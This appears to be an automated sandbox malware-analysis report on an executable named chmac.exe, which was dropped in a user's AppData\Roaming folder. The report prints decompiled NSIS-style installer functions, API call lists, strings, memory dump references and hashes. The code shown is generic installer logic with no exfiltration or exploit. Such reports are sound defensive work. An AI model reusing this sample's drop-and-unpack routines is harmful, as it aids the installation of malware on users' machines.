Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
SetDlgItemTextA.USER32 ref: 00404549

Strings

pzusn, xrefs: 004043DA, 004043DF, 004043EA
C:\Users\user\AppData\Local\Temp, xrefs: 004043C9
A, xrefs: 0040439C

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$pzusn
API String ID: 2246997448-3701615307
Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA7, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t73 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4;
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}

APIs

GetVersion.KERNEL32(?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
GetSystemDirectoryA.KERNEL32 ref: 00405BC6
GetWindowsDirectoryA.KERNEL32(pzusn,00000400), ref: 00405BD9
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
SHGetPathFromIDListA.SHELL32(00000000,pzusn), ref: 00405C23
CoTaskMemFree.OLE32(00000000), ref: 00405C2E
lstrcatA.KERNEL32(pzusn,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
lstrlenA.KERNEL32(pzusn,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2

Strings

pzusn, xrefs: 00405AD0, 00405B93, 00405BB0, 00405BC5, 00405BD8, 00405BF4, 00405C1F, 00405C4F, 00405C55, 00405C6D, 00405C80, 00405C9B, 00405CA1, 00405CAC, 00405CD6
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B95
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405C4A

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$pzusn
API String ID: 900638850-4179759605
Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE3, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
CharNextA.USER32(?,?,?,00000000), ref: 00405D48
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 00405CE9
*?|<>/":, xrefs: 00405D2B

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3985186982
Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9E, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

APIs

GetWindowLongA.USER32 ref: 00403EBB
GetSysColor.USER32(00000000), ref: 00403ED7
SetTextColor.GDI32(?,00000000), ref: 00403EE3
SetBkMode.GDI32(?,?), ref: 00403EEF
GetSysColor.USER32(?), ref: 00403F02
SetBkColor.GDI32(?,?), ref: 00403F12
DeleteObject.GDI32(?), ref: 00403F2C
CreateBrushIndirect.GDI32(?), ref: 00403F36

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
GlobalFree.KERNEL32 ref: 00402717
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
GlobalFree.KERNEL32 ref: 00402730
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E23, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

APIs

lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004046F2, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
GetMessagePos.USER32 ref: 00404715
ScreenToClient.USER32 ref: 0040472F
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767

Strings

f, xrefs: 00404743

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b3a
0x00402b48
0x00402b4e
0x00402b4e
0x00402b5c
0x00402b5e
0x00402b6a
0x00402b6f
0x00402b71
0x00402b71
0x00402b7c
0x00402b8c
0x00402b9e
0x00402b9e
0x00402ba6

APIs

SetTimer.USER32 ref: 00402B48
wsprintfA.USER32 ref: 00402B7C
SetWindowTextA.USER32(?,?), ref: 00402B8C
SetDlgItemTextA.USER32 ref: 00402B9E

Strings

unpacking data: %d%%, xrefs: 00402B6A, 00402B7A
verifying installer: %d%%, xrefs: 00402B71

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
